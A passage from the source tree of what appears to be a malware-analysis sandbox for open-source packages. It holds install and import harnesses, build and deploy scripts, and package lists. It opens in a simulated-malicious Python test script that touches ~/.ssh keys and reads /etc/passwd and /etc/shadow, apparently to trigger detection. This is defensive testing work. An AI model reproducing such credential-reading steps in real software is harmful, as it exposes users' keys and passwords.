28 |             original_file_data += f.read()
29 |           with open(full_file_path, "a") as f:
30 |             f.write("\nWriting to files in ~/.ssh from: " + called_from)
31 |           # Reset the original state of the files.
32 |           with open(full_file_path, "w") as f:
33 |             f.write(original_file_data)
34 |         if print_logs:
35 |           print("Files in ssh keys directory", files_in_ssh_keys_directory)
36 |       except Exception as e:
37 |         # Fail gracefully to allow execution to continue.
38 |         if print_logs:
39 |           print(f"An exception occurred when calling access_ssh_keys: {str(e)}")
40 |     elif print_logs:
41 |       print("Could not locate ssh key directory.")
42 | 
43 | def read_file_and_log(file_to_read: str, called_from: str, print_logs: bool) -> None:
44 |   if os.path.isfile(file_to_read):
45 |     try:
46 |       with open(file_to_read, "r") as f:
47 |         file_lines = f.readlines()
48 |         if print_logs:
49 |           print("Read " + file_to_read + " from: " + called_from + ". Lines: " + str(len(file_lines)))
50 |     except Exception as e:
51 |       # Fail gracefully to allow execution to continue.
52 |       if print_logs:
53 |         print(f"An exception occurred when calling read_file_and_log: {str(e)}")
54 | 
55 | def access_passwords(called_from: str, print_logs: bool) -> None:
56 |   password_file = os.path.join(os.path.abspath(os.sep), "etc", "passwd")
57 |   shadow_password_file = os.path.join(os.path.abspath(os.sep), "etc", "shadow")
58 |   read_file_and_log(password_file, called_from, print_logs)
59 |   # Requires root to read.
60 |   read_file_and_log(shadow_password_file, called_from, print_logs)
61 | 
62 | # Collection of functionalities to run that can be customized.
63 | https_functions = [send_https_post_request]
64 | access_credentials_functions = [access_ssh_keys, access_passwords]
65 | 
66 | def main():
67 |   [f("main function", True) for f in https_functions + access_credentials_functions]
68 | 
69 | if __name__ == "__main__":
70 |   main()
71 | 


--------------------------------------------------------------------------------
/sandboxes/dynamicanalysis/analyze-ruby.rb:
--------------------------------------------------------------------------------
  1 | #!/usr/bin/env ruby
  2 | #
  3 | require 'find'
  4 | require 'open3'
  5 | require 'pathname'
  6 | 
  7 | class Package
  8 |   attr_reader :name, :version, :local_file
  9 | 
 10 |   def initialize(name:, version:, local_file:)
 11 |     @name, @version, @local_file = name, version, local_file
 12 |   end
 13 | end
 14 | 
 15 | def install(package)
 16 |   cmd = ["gem", "install"]
 17 |   if package.local_file
 18 |     cmd << package.local_file
 19 |   else
 20 |     if package.version
 21 |       cmd << "-v"
 22 |       cmd << package.version
 23 |     end
 24 |     cmd << package.name
 25 |   end
 26 | 
 27 |   output, status = Open3.capture2e(*cmd)
 28 |   puts output
 29 | 
 30 |   if status.success?
 31 |     puts "Install succeeded."
 32 |     return
 33 |   end
 34 | 
 35 |   # Always exit on failure.
 36 |   # Install failing is either an interesting issue, or an opportunity to
 37 |   # improve the analysis.
 38 |   puts "Install failed."
 39 |   exit 1
 40 | end
 41 | 
 42 | def importPkg(package)
 43 |   spec = Gem::Specification.find_by_name(package.name)
 44 | 
 45 |   spec.require_paths.each do |require_path|
 46 |     if Pathname.new(require_path).absolute?
 47 |       lib_path = Pathname.new(require_path)
 48 |     else
 49 |       lib_path = Pathname.new(File.join(spec.full_gem_path, require_path))
 50 |     end
 51 | 
 52 |     Find.find(lib_path.to_s) do |path|
 53 |       if path.end_with?('.rb')
 54 |         relative_path = Pathname.new(path).relative_path_from(lib_path)
 55 | 
 56 |         require_path = relative_path.to_s.delete_suffix('.rb')
 57 |         puts "Loading #{require_path}"
 58 |         begin
 59 |           require require_path
 60 |         rescue Exception => e
 61 |           puts "Failed to load #{require_path}: #{e}"
 62 |         end
 63 |       end
 64 |     end
 65 |   end
 66 | end
 67 | 
 68 | phases = {
 69 |   "all" => [method(:install), method(:importPkg)],
 70 |   "install" => [method(:install)],
 71 |   "import" => [method(:importPkg)],
 72 | }
 73 | 
 74 | if ARGV.length < 2 || ARGV.length > 4
 75 |   puts "Usage: #{$0} [--local file | --version version] phase package"
 76 |   exit 1
 77 | end
 78 | 
 79 | local_file = nil
 80 | version = nil
 81 | 
 82 | # Parse the arguments manually to avoid introducing unnecessary dependencies
 83 | # and side effects that add noise to the strace output.
 84 | case ARGV[0]
 85 | when "--local"
 86 |   ARGV.shift
 87 |   local_file = ARGV.shift
 88 | when "--version"
 89 |   ARGV.shift
 90 |   version = ARGV.shift
 91 | end
 92 | 
 93 | phase = ARGV.shift
 94 | package_name = ARGV.shift
 95 | 
 96 | package = Package.new(name: package_name, version: version, local_file: local_file)
 97 | 
 98 | if !phases.has_key?(phase)
 99 |   puts "Unknown phase #{phase} specified"
100 |   exit 1
101 | end
102 | 
103 | phases[phase].each { |m| m.call(package) }
104 | 


--------------------------------------------------------------------------------
/sandboxes/dynamicanalysis/analyze-rust.py:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/env python3
 2 | from dataclasses import dataclass
 3 | import os
 4 | import sys
 5 | import subprocess
 6 | import traceback
 7 | from typing import Optional
 8 | 
 9 | @dataclass
10 | class Package:
11 |     """Class for tracking a package."""
12 |     name: str
13 |     version: Optional[str] = None
14 |     local_path: Optional[str] = None
15 | 
16 |     def get_dependency_line(self):
17 |       if self.local_path:
18 |         return f'{self.name} = {{ path = "{self.local_path}" }}'
19 |       elif self.version:
20 |         return f'{self.name} = "{self.version}"'
21 |       else:
22 |         return f'{self.name} = "*"'
23 | 
24 | def install(package: Package):
25 |     """Cargo build."""
26 |     try:
27 |       with open("Cargo.toml", 'a') as handle:
28 |         handle.write(package.get_dependency_line() + '\n')
29 |         handle.flush()
30 |     
31 |       output = subprocess.check_output(['cargo', 'build'], stderr=subprocess.STDOUT)
32 |       
33 |       print('Install succeeded:')
34 |       print(output.decode())
35 |     except subprocess.CalledProcessError as e:
36 |       print('Failed to install:')
37 |       print(e.output.decode())
38 |       # Always raise.
39 |       # Install failing is either an interesting issue, or an opportunity to
40 |       # improve the analysis.
41 |       raise
42 | 
43 | def importPkg(package: Package):
44 |     path_to_rs = os.path.join(os.getcwd(), 'src', 'main.rs')
45 |     try:
46 |       with open(path_to_rs, 'r+') as handle:
47 |         content = handle.read()
48 |         handle.seek(0, 0)
49 |         handle.write('#[allow(unused_imports)]\n')
50 |         handle.write(f'use {package.name.strip()}::*;' + '\n' + content)
51 |         handle.flush()
52 |       subprocess.check_output(['cargo', 'run'], stderr=subprocess.STDOUT)
53 |     except subprocess.CalledProcessError as e:
54 |       print('Failed to import:')
55 |       print(e.output.decode())
56 |       traceback.print_exc()
57 | 
58 | PHASES = {
59 |     "all": [install, importPkg],
60 |     "install": [install],
61 |     "import": [importPkg],
62 | }
63 | 
64 | def main():
65 |     args = list(sys.argv)
66 |     script = args.pop(0)
67 | 
68 |     if len(args) < 2 or len(args) > 4:
69 |         raise ValueError(f'Usage: {script} [--local file | --version version] phase package_name')
70 | 
71 |     # Parse the arguments manually to avoid introducing unnecessary dependencies
72 |     # and side effects that add noise to the strace output.
73 |     local_path = None
74 |     version = None
75 |     if args[0] == '--local':
76 |         args.pop(0)
77 |         local_path = args.pop(0)
78 |     elif args[0] == '--version':
79 |         args.pop(0)
80 |         version = args.pop(0)
81 | 
82 |     phase = args.pop(0)
83 |     package_name = args.pop(0)
84 | 
85 |     if not phase in PHASES:
86 |         print(f'Unknown phase {phase} specified.')
87 |         exit(1)
88 | 
89 |     package = Package(name=package_name, version=version, local_path=local_path)
90 | 
91 |     # Execute for the specified phase.
92 |     for phase in PHASES[phase]:
93 |         phase(package)
94 | 
95 | 
96 | if __name__ == '__main__':
97 |     main()
98 | 


--------------------------------------------------------------------------------
/sandboxes/dynamicanalysis/bowerrc:
--------------------------------------------------------------------------------
1 | { "allow-root": true }


--------------------------------------------------------------------------------
/sandboxes/dynamicanalysis/pypi-packages.txt:
--------------------------------------------------------------------------------
 1 | # These Python packages are installed in the sandbox prior to the package under analysis
 2 | # They are meant to simulate packages commonly installed on a typical system.
 3 | # Hashes are used to pin dependency artifacts (https://pip.pypa.io/en/stable/topics/secure-installs/)
 4 | 
 5 | # The hashes below are for the binary distributions
 6 | 
 7 | certifi==2022.12.7 \
 8 |     --hash=sha256:4ad3232f5e926d6718ec31cfc1fcadfde020920e278684144551c91769c7bc18
 9 | charset-normalizer==2.1.1 \
10 |     --hash=sha256:83e9a75d1911279afd89352c68b45348559d1fc0506b054b346651b5e7fee29f
11 | idna==3.4 \
12 |     --hash=sha256:90b77e79eaa3eba6de819a0c442c0b4ceefc341a7a2ab77d7562bf49f425c5c2
13 | requests==2.28.1 \
14 |     --hash=sha256:8fefa2a1a1365bf5520aac41836fbee479da67864514bdb821f31ce07ce65349
15 | urllib3==1.26.14 \
16 |     --hash=sha256:75edcdc2f7d85b137124a6c3c9fc3933cdeaa12ecb9a6a959f22797a0feca7e1
17 | 


--------------------------------------------------------------------------------
/sandboxes/staticanalysis/Dockerfile:
--------------------------------------------------------------------------------
 1 | FROM golang:1.23.1@sha256:4a3c2bcd243d3dbb7b15237eecb0792db3614900037998c2cd6a579c46888c1e as build
 2 | 
 3 | # Note: Dockerfile uses paths relative to the top-level project directory,
 4 | # so it should be built from that directory, i.e:
 5 | # $ cd package-analysis
 6 | # $ docker build -f sandboxes/staticanalysis/Dockerfile .
 7 | 
 8 | # Cache dependencies to avoid downloading again on code change
 9 | WORKDIR /src
10 | # Dependencies for package analysis
11 | COPY ./go.mod ./go.sum ./
12 | 
13 | RUN go mod download
14 | 
15 | COPY . ./
16 | 
17 | WORKDIR /src/sandboxes/staticanalysis
18 | # If CGO is disabled then we don't need glibc
19 | RUN CGO_ENABLED=0 go build -o staticanalyze staticanalyze.go
20 | 
21 | FROM alpine:3.17.1@sha256:93d5a28ff72d288d69b5997b8ba47396d2cbb62a72b5d87cd3351094b5d578a0
22 | RUN apk add --no-cache file && \
23 | 	apk add --no-cache nodejs && \
24 | 	apk add --no-cache npm && \
25 | 	apk add --no-cache python3
26 | 
27 | COPY --from=build /src/sandboxes/staticanalysis/staticanalyze /usr/local/bin/staticanalyze
28 | RUN chmod 755 /usr/local/bin/staticanalyze
29 | 
30 | RUN mkdir /npm_deps
31 | COPY --from=build /src/internal/staticanalysis/parsing/package.json /src/internal/staticanalysis/parsing/package-lock.json /npm_deps/
32 | 
33 | # cache NPM installs in /npm_cache so that static analysis binary can use them
34 | RUN mkdir -m 755 /npm_cache && \
35 | 	npm ci --prefix /npm_deps --cache /npm_cache
36 | 
37 | WORKDIR /app
38 | 
39 | ENTRYPOINT [ "sleep" ]
40 | CMD [ "30m" ]
41 | 


--------------------------------------------------------------------------------
/scripts/analyse-tarballs.sh:
--------------------------------------------------------------------------------
 1 | #! /bin/bash
 2 | 
 3 | # Replace with root of package analysis folder
 4 | PACKAGE_ANALYSIS_ROOT=~/package-analysis
 5 | 
 6 | # This script runs static analysis on all packages in a directory and
 7 | # creates a new directory with all the static analysis results for each package.
 8 | # Currently, it only supports NPM packages (as static analysis does).
 9 | 
10 | RUN_ANALYSIS="$PACKAGE_ANALYSIS_ROOT/scripts/run_analysis.sh"
11 | FORMAT_JSON="$PACKAGE_ANALYSIS_ROOT/scripts/format-static-analysis-json.py"
12 | 
13 | if ! [[ -x "$RUN_ANALYSIS" ]]; then
14 | 	echo "could not locate run_analysis.sh script at $RUN_ANALYSIS"
15 | 	exit 1
16 | elif ! [[ -x "$FORMAT_JSON" ]]; then
17 | 	echo "could not locate format-json.py script at $FORMAT_JSON"
18 | 	exit 1
19 | fi
20 | 
21 | ARCHIVES_DIR="$1"
22 | RESULTS_DIR=${2:-"$ARCHIVES_DIR-results"}
23 | START_LETTER="$3"
24 | 
25 | if [[ -z "$ARCHIVES_DIR" ]]; then
26 | 	echo "Archives dir not provided, please specify directory of .tgz archives"
27 | 	exit 1
28 | fi
29 | 
30 | if [[ ! -d "$ARCHIVES_DIR" ]]; then
31 | 	echo "error: archives dir is not a directory"
32 | 	exit 1
33 | fi
34 | 
35 | 
36 | mkdir -p "$RESULTS_DIR"
37 | 
38 | function process_archive {
39 | 	ARCHIVE_PATH="$1"
40 | 	RESULTS_DIR="$2"
41 | 	START_LETTER="$3"
42 | 	if [[ -z "$ARCHIVE_PATH" ]]; then
43 | 		echo "Archive path is empty"
44 | 		return 1
45 | 	elif [[ -z "$RESULTS_DIR" ]]; then
46 | 		echo "Results dir is empty"
47 | 		return 1
48 | 	fi
49 | 
50 | 	PACKAGE_VERSION_EXT=${ARCHIVE_PATH##"$ARCHIVES_DIR/"}
51 | 	PACKAGE_VERSION=${PACKAGE_VERSION_EXT%%.tgz}
52 | 	PACKAGE_FIRST_LETTER=${PACKAGE_VERSION:0:1}
53 | 	if [[ "$PACKAGE_FIRST_LETTER" < "$START_LETTER" ]]; then
54 | 		echo SKIP "$PACKAGE_VERSION"
55 | 		return
56 | 	fi
57 | 	# package name is everything before the last '-' character
58 | 	# package version is everything between the last '-' character and .tgz
59 | 	PACKAGE=$(python3 -c "print('-'.join(\"$PACKAGE_VERSION\".split('-')[:-1]))")
60 | 	VERSION=$(python3 -c "print(\"$PACKAGE_VERSION\".split('-')[-1])")
61 | 	echo "Package: $PACKAGE"
62 | 	echo "Version: $VERSION"
63 | 
64 | 	OUTPUT_RESULTS_DIR=$(mktemp -d)
65 | 
66 | 	# Notes on options:
67 | 	# 1. To run local sandbox images, add -nopull
68 | 	# 2. If running static analysis only from local images (i.e. -nopull), network access is not required.
69 | 	#    In this case, the -offline -fully-offline options can be added to disable network access totally.
70 | 	RESULTS_DIR="$OUTPUT_RESULTS_DIR/dynamic" STATIC_RESULTS_DIR="$OUTPUT_RESULTS_DIR/static" "$RUN_ANALYSIS" \
71 | 		-ecosystem npm -package "$PACKAGE" -local "$ARCHIVE_PATH" -nointeractive
72 | 
73 | 	# pretty print while keeping some of the small JSON structs on a single line
74 | 	"$FORMAT_JSON" "$OUTPUT_RESULTS_DIR/dynamic/results.json" "$RESULTS_DIR/$PACKAGE_VERSION-results-dynamic.json"
75 | 	"$FORMAT_JSON" "$OUTPUT_RESULTS_DIR/static/results.json" "$RESULTS_DIR/$PACKAGE_VERSION-results-static.json"
76 | 
77 | 	rm -rf "$OUTPUT_RESULTS_DIR"
78 | }
79 | 
80 | for ARCHIVE_PATH in "$ARCHIVES_DIR"/*.tgz "$ARCHIVES_DIR"/*.tar.gz; do
81 | 	process_archive "$ARCHIVE_PATH" "$RESULTS_DIR" "$START_LETTER"
82 | done
83 | 


--------------------------------------------------------------------------------
/scripts/deploy.sh:
--------------------------------------------------------------------------------
 1 | #! /bin/bash
 2 | 
 3 | if [[ -z ${GIT_TAG} ]]; then
 4 | 	echo "Missing git tag"
 5 | 	exit 1
 6 | fi
 7 | 
 8 | echo "git checkout ${GIT_TAG}"
 9 | git checkout "${GIT_TAG}"
10 | 
11 | if ! git diff-index --quiet HEAD; then
12 | 	echo "there are uncommitted changes, please ensure the repo is clean"
13 | 	exit 1
14 | fi
15 | 
16 | gcloud container clusters get-credentials analysis-cluster --zone=us-central1-c --project=ossf-malware-analysis
17 | 
18 | pushd infra/worker || (echo "pushd infra/worker failed" && exit 1)
19 | 
20 | echo "Were any changes made to the k8s config?"
21 | echo "Enter y to apply config changes and then restart workers, n to just restart, ctrl-C to exit"
22 | read -r yn
23 | case $yn in
24 | 	[Yy]* )
25 | 		echo "kubectl apply -f $(pwd)"
26 | 		kubectl apply -f .
27 | 		;;
28 | 	[Nn]* )
29 | 		echo "kubectl rollout restart deployment workers-deployment"
30 | 		kubectl rollout restart statefulset workers-deployment
31 | 	;;
32 | esac
33 | 
34 | 
35 | popd || (echo "failed to popd" && exit 1)
36 | 


--------------------------------------------------------------------------------
/scripts/format-static-analysis-json.py:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/env python3
 2 | 
 3 | """
 4 | Custom tool to pretty-print JSON with certain fields compacted
 5 | 
 6 | Adapted from source of `python -m json.tool`
 7 | reference: github.com/python/cpython/blob/main/Lib/json/tool.py
 8 | """
 9 | 
10 | import json
11 | import re
12 | import sys
13 | 
14 | 
15 | # Changes JSON structs that are formatted like:
16 | #     {
17 | #         "key1": ...
18 | #     }
19 | # into ones like
20 | #     { "key1": ... }
21 | struct_single_key_substitution = (
22 |     re.compile('{$\\n^\\s*"(.+)": ?(.*)$\\n^\\s*}', re.MULTILINE),
23 |     '{ "\\1": \\2 }'
24 | )
25 | 
26 | # Changes JSON structs that are formatted like:
27 | #     {
28 | #         "key1": ...,
29 | #         "key2": ...
30 | #     }
31 | # into ones like
32 | #     { "key1": ..., "key2": ... }
33 | struct_pair_substitution = (
34 |     re.compile('{$\\n^\\s*"(.+)": ?(.*),$\\n^\\s*"(.+)": ?(.*)$\\n^\\s*}', re.MULTILINE),
35 |     '{ "\\1": \\2, "\\3": \\4 }'
36 | )
37 | 
38 | # Changes JSON structs that are formatted like:
39 | #     {
40 | #         "key1": ...,
41 | #         "key2": ...,
42 | #         "key3": ...
43 | #     }
44 | # into ones like
45 | #     { "key1": ..., "key2": ..., "key3": ... }
46 | struct_triple_substitution = (
47 |     re.compile('{$\\n^\\s*"(.+)": ?(.*),$\\n^\\s*"(.+)": ?(.*),$\\n^\\s*"(.+)": ?(.*)$\\n^\\s*}', re.MULTILINE),
48 |     '{ "\\1": \\2, "\\3": \\4, "\\5": \\6 }'
49 | )
50 | 
51 | all_substitutions = (struct_single_key_substitution, struct_pair_substitution, struct_triple_substitution)
52 | 
53 | 
54 | # Pretty prints a JSON object with newlines and indentation, then applies
55 | # the substitutions above while maintaining indentation level.
56 | def format_json(json_object) -> str:
57 |     # pretty print with newlines and indent with 4 spaces,
58 |     pretty_printed = json.dumps(json_object, indent=4)
59 | 
60 |     # apply all replacements in sequence
61 |     for (pattern, replacement) in all_substitutions:
62 |         pretty_printed = re.sub(pattern, replacement, pretty_printed)
63 | 
64 |     return pretty_printed
65 | 
66 | 
67 | def main(args: list[str]):
68 |     if "--help" in args:
69 |         print(f"Usage: {args[0]} [<infile> [<outfile>]]")
70 |         return
71 | 
72 |     input_path = args[1] if len(args) >= 2 else None
73 |     output_path = args[2] if len(args) >= 3 else None
74 | 
75 |     if input_path:
76 |         with open(input_path) as infile:
77 |             json_object = json.load(infile)
78 |     else:
79 |         json_object = json.load(sys.stdin)
80 | 
81 |     custom_formatted_json = format_json(json_object)
82 | 
83 |     if output_path:
84 |         with open(output_path, "w", encoding="utf-8") as outfile:
85 |             outfile.write(custom_formatted_json)
86 |             outfile.write("\n")
87 |     else:
88 |         print(custom_formatted_json)
89 | 
90 | 
91 | if __name__ == '__main__':
92 |     try:
93 |         main(sys.argv)
94 |     except BrokenPipeError as exc:
95 |         sys.exit(exc.errno)
96 |     except ValueError as e:
97 |         raise SystemExit(e)
98 | 
99 | 


--------------------------------------------------------------------------------
/test/e2e/README.md:
--------------------------------------------------------------------------------
 1 | # End to End Testing with Package-Feeds integration
 2 | 
 3 | This directory helps run end-to-end tests of the package analysis system
 4 | to ensure everything is working properly.
 5 | In particular, local changes to both the worker/analysis and sandbox images can be tested
 6 | before they are pushed to the docker registry.
 7 | 
 8 | The test is orchestrated using docker-compose, using an adapted setup based on the one in
 9 | `configs/e2e`. All the necessary commands can be run via the project Makefile.
10 | 
11 | ## Running
12 | 
13 | ### Starting the test
14 | 
15 | In the top-level project directory, run
16 | 
17 | ```shell
18 | $ make RELEASE_TAG=test build_prod_images sync_prod_sandboxes # rebuild images with 'test' tag
19 | $ make e2e_test_start
20 | 
21 | ```
22 | 
23 | ### Stopping the test
24 | 
25 | In the top-level project directory, run
26 | 
27 | ```shell
28 | $ make e2e_test_stop
29 | ```
30 | 
31 | ## Analysis Output
32 | 
33 | Output can be found at http://localhost:9000/minio/package-analysis,
34 | using the following credentials for authentication:
35 | 
36 | - username: `minio`
37 | - password: `minio123`
38 | 
39 | ## Logs Access
40 | 
41 | In the top-level project directory, run
42 | 
43 | `make e2e_test_logs_feeds` to see information on the packages which have been send downstream.
44 | 
45 | `make e2e_test_logs_scheduler` to see information on the packages which have been received and proxied onto the analysis workers.
46 | 
47 | `make e2e_test_logs_analysis` to see analysis stdout (too much to be useful); better to check minio output as described above.
48 | 
49 | ## PubSub (Kafka) Inspection
50 | 
51 | Output from the Kafka PubSub topics can be inspected using
52 | [KafkaCat](https://github.com/edenhill/kcat).
53 | 
54 | 1. Install `kafkacat` or `kcat` (e.g. `sudo apt install kafkacat`)
55 | 2. Run `kafkacat` to observe the topics:
56 |     - package-feeds: `kafkacat -C -J -b localhost:9094 -t package-feeds`
57 |     - workers: `kafkacat -C -J -b localhost:9094 -t workers`
58 |     - notifications: `kafkacat -C -J -b localhost:9094 -t notifications`
59 | 
60 | ## Troubleshooting
61 | 
62 | ### Feeds does not start (missing config)
63 | 
64 | This can happen if `./config` is not world-readable. You will see the error message `open /config/feeds.yml: permission denied` in the feeds logs.
65 | 
66 | To fix simply run:
67 | 
68 | ```shell
69 | $ chmod ugo+rx ./config
70 | $ chmod ugo+r ./config/feeds.yml
71 | ```
72 | 
73 | ### Sandbox container is not starting (cgroups v2)
74 | 
75 | If the `analysis` logs show failures when trying to start the sandbox container, your machine may need to be configured to use cgroups v2.
76 | 
77 | To work with cgroups v2 you will need to:
78 | 
79 | 1. add/edit `/etc/docker/daemon.json` and the following:
80 | 
81 | ```json
82 | {
83 |     "default-cgroupns-mode": "host"
84 | }
85 | ```
86 | 
87 | 2. restart dockerd (if it is running). e.g.:
88 | 
89 | ```shell
90 | $ systemctl restart docker.service
91 | ```
92 | 


--------------------------------------------------------------------------------
/test/e2e/docker-compose.test.yml:
--------------------------------------------------------------------------------
 1 | version: "3"
 2 | services:
 3 |   analysis:
 4 |     image: gcr.io/ossf-malware-analysis/analysis:test
 5 |     environment:
 6 |       OSSF_SANDBOX_NOPULL: "true"
 7 |     # for mounting local sandbox images inside container
 8 |     volumes:
 9 |       - "/var/lib/containers:/var/lib/containers"
10 | 
11 |   scheduler:
12 |     image: gcr.io/ossf-malware-analysis/scheduler:test
13 | 


--------------------------------------------------------------------------------
/tools/README.md:
--------------------------------------------------------------------------------
1 | # Package Analysis Tools
2 | 
3 | This directory contains scripts and tools.
4 | 


--------------------------------------------------------------------------------
/tools/analysis/README.md:
--------------------------------------------------------------------------------
 1 | # Analysis Tools
 2 | 
 3 | ## Analysis Runner
 4 | 
 5 | The `analysis_runner.py` script is used to inject packages into the PubSub
 6 | queue the analysis pipeline consumes work from.
 7 | 
 8 | `node.txt`, `python.txt` and `rubygems.txt` contain a lists of the top packages
 9 | from these package repositories (at the time of creation). The data is from
10 | [NPM](https://www.npmjs.com/browse/depended) (* dead),
11 | [PyPI](https://hugovk.github.io/top-pypi-packages/top-pypi-packages-30-days.json)
12 | and [RubyGems](https://rubygems.org/stats).
13 | 
14 | ### Prerequisites
15 | 
16 | This script requires:
17 | 
18 | - Python 3
19 | - [Google Cloud SDK](https://cloud.google.com/sdk/docs/install)
20 | 
21 | ### Example usage
22 | 
23 | Firstly, ensure you are authenticated with the cloud project:
24 | 
25 | ```shell
26 | $ gcloud auth login
27 | ```
28 | 
29 | Here are some possible ways to invoke the script:
30 | 
31 | ```shell
32 | $ python3 analysis_runner.py pypi --list python.txt
33 | $ python3 analysis_runner.py npm --list node.txt
34 | $ python3 analysis_runner.py npm --name my-npm-package
35 | $ python3 analysis_runner.py npm --name my-npm-package --version 0.1.1 --file /path/to/local.tgz
36 | ```
37 | 
38 | ### Bulk backfill
39 | 
40 | To request a bulk backfill of a list of packages in a particular ecosystem:
41 | 
42 | ```shell
43 | $ ./backfill.sh <path/to/packages/delimited/by/newlines> <ecosystem>
44 | ```
45 | 


--------------------------------------------------------------------------------
/tools/analysis/backfill.sh:
--------------------------------------------------------------------------------
 1 | #!/bin/sh -x
 2 | # Script to bulk request backfills in parallel.
 3 | 
 4 | NUM_WORKERS=128
 5 | 
 6 | if [ $# -lt 2 ]; then
 7 |   echo "Usage: $0 <path to package list> <ecosystem>"
 8 |   exit 1
 9 | fi
10 | 
11 | cat $1 | xargs -I {} -P $NUM_WORKERS -n 1 python3 analysis_runner.py -a -n {} $2
12 | 


--------------------------------------------------------------------------------
/tools/analysis/node.txt:
--------------------------------------------------------------------------------
  1 | lodash
  2 | react
  3 | chalk
  4 | tslib
  5 | request
  6 | commander
  7 | express
  8 | moment
  9 | axios
 10 | react-dom
 11 | prop-types
 12 | fs-extra
 13 | debug
 14 | vue
 15 | uuid
 16 | async
 17 | bluebird
 18 | core-js
 19 | classnames
 20 | inquirer
 21 | yargs
 22 | rxjs
 23 | webpack
 24 | underscore
 25 | typescript
 26 | glob
 27 | mkdirp
 28 | dotenv
 29 | body-parser
 30 | @types/node
 31 | @babel/runtime
 32 | node-fetch
 33 | colors
 34 | minimist
 35 | jquery
 36 | aws-sdk
 37 | semver
 38 | babel-loader
 39 | eslint
 40 | babel-runtime
 41 | redux
 42 | css-loader
 43 | winston
 44 | rimraf
 45 | @babel/core
 46 | jsonwebtoken
 47 | ora
 48 | style-loader
 49 | styled-components
 50 | babel-core
 51 | shelljs
 52 | yeoman-generator
 53 | react-redux
 54 | js-yaml
 55 | cheerio
 56 | eslint-plugin-import
 57 | @angular/core
 58 | babel-eslint
 59 | through2
 60 | ramda
 61 | file-loader
 62 | vue-router
 63 | eslint-plugin-react
 64 | @angular/common
 65 | node-sass
 66 | zone.js
 67 | react-router-dom
 68 | reflect-metadata
 69 | mongoose
 70 | q
 71 | handlebars
 72 | html-webpack-plugin
 73 | @angular/platform-browser
 74 | url-loader
 75 | webpack-dev-server
 76 | ws
 77 | @angular/compiler
 78 | @angular/forms
 79 | postcss-loader
 80 | request-promise
 81 | mongodb
 82 | @angular/platform-browser-dynamic
 83 | sass-loader
 84 | bootstrap
 85 | @angular/router
 86 | @babel/preset-env
 87 | gulp
 88 | jest
 89 | qs
 90 | ejs
 91 | babel-polyfill
 92 | superagent
 93 | object-assign
 94 | mocha
 95 | path
 96 | autoprefixer
 97 | graphql
 98 | eslint-plugin-jsx-a11y
 99 | cors
100 | babel-preset-es2015
101 | socket.io
102 | react-scripts
103 | redis
104 | chai
105 | immutable
106 | prettier
107 | @types/react
108 | xml2js


--------------------------------------------------------------------------------
/tools/analysis/python.txt:
--------------------------------------------------------------------------------
  1 | urllib3
  2 | six
  3 | setuptools
  4 | botocore
  5 | requests
  6 | python-dateutil
  7 | certifi
  8 | pip
  9 | idna
 10 | s3transfer
 11 | chardet
 12 | pyyaml
 13 | boto3
 14 | wheel
 15 | rsa
 16 | pyasn1
 17 | jmespath
 18 | numpy
 19 | awscli
 20 | docutils
 21 | cffi
 22 | protobuf
 23 | pytz
 24 | colorama
 25 | attrs
 26 | pycparser
 27 | markupsafe
 28 | jinja2
 29 | cryptography
 30 | pandas
 31 | requests-oauthlib
 32 | oauthlib
 33 | importlib-metadata
 34 | google-api-core
 35 | click
 36 | google-auth
 37 | zipp
 38 | cachetools
 39 | pyparsing
 40 | pyasn1-modules
 41 | decorator
 42 | typing-extensions
 43 | packaging
 44 | aiohttp
 45 | multidict
 46 | future
 47 | pyjwt
 48 | google-cloud-core
 49 | googleapis-common-protos
 50 | futures
 51 | google-api-python-client
 52 | jsonschema
 53 | uritemplate
 54 | yarl
 55 | pygments
 56 | google-cloud-storage
 57 | isodate
 58 | pyrsistent
 59 | google-auth-httplib2
 60 | google-resumable-media
 61 | werkzeug
 62 | lxml
 63 | py
 64 | pillow
 65 | joblib
 66 | grpcio
 67 | msrest
 68 | scipy
 69 | websocket-client
 70 | azure-storage-blob
 71 | sqlalchemy
 72 | pytest
 73 | async-timeout
 74 | tornado
 75 | toml
 76 | prometheus-client
 77 | azure-core
 78 | pyarrow
 79 | absl-py
 80 | defusedxml
 81 | psutil
 82 | wrapt
 83 | pyopenssl
 84 | pexpect
 85 | flask
 86 | ptyprocess
 87 | webencodings
 88 | httplib2
 89 | prompt-toolkit
 90 | pluggy
 91 | ipython
 92 | itsdangerous
 93 | traitlets
 94 | entrypoints
 95 | scikit-learn
 96 | appdirs
 97 | ipython-genutils
 98 | bleach
 99 | azure-common
100 | tqdm
101 | 


--------------------------------------------------------------------------------
/tools/analysis/rubygems.txt:
--------------------------------------------------------------------------------
 1 | activesupport
 2 | aws-sdk-core
 3 | bundler
 4 | diff-lcs
 5 | i18n
 6 | json
 7 | mime-types
 8 | minitest
 9 | multi_json
10 | nokogiri
11 | rack
12 | rake
13 | rspec
14 | rspec-core
15 | rspec-expectations
16 | rspec-mocks
17 | rspec-support
18 | rubygems-update
19 | thor
20 | tzinfo


--------------------------------------------------------------------------------
/tools/gvisor/README.md:
--------------------------------------------------------------------------------
 1 | # GVisor Scripts
 2 | 
 3 | ## `runsc_compat.sh`
 4 | 
 5 | This script improves the compatibility of `runsc` when it is used by
 6 | [Podman](https://podman.io).
 7 | 
 8 | This project uses [GVisor](https://github.com/google/gvisor)'s OCI runtime
 9 | `runsc` to provide a sandbox for analyzing packages. The `runsc` sandbox is used
10 | by setting it as the runtime for Podman running inside a Docker container.
11 | 
12 | Unfortunately there are slight differences in the flags passed from Podman
13 | (specifically `conmon`) to the `runsc`.
14 | 
15 | In particular, when `podman exec` is called on a running container, the `-d`
16 | (detach) flag is passed by `conmon` to the OCI runtime. However this flag is not
17 | supported by `runsc`. Instead `runsc` supports `-detach`.
18 | 
19 | So, to ensure `runsc` works correctly with Podman this script will turn `-d`
20 | into `-detach` when `exec` is called.


--------------------------------------------------------------------------------
/tools/gvisor/runsc_compat.sh:
--------------------------------------------------------------------------------
 1 | #!/bin/bash
 2 | 
 3 | BIN="/usr/bin/runsc"
 4 | 
 5 | IS_EXEC=0
 6 | for arg; do
 7 |     if [ "$arg" == "exec" ]; then
 8 |         IS_EXEC=1
 9 |     fi
10 | done
11 | 
12 | 
13 | # GVisor's runsc does not support "-d" which is passed to it from conmon.
14 | # runc supports "-d" for running detached so translate the "-d" argument to
15 | # the "-detach" flavor supported by runsc.
16 | if [ $IS_EXEC -eq 1 ]; then
17 |     declare -a NEWARGS
18 |     for arg; do
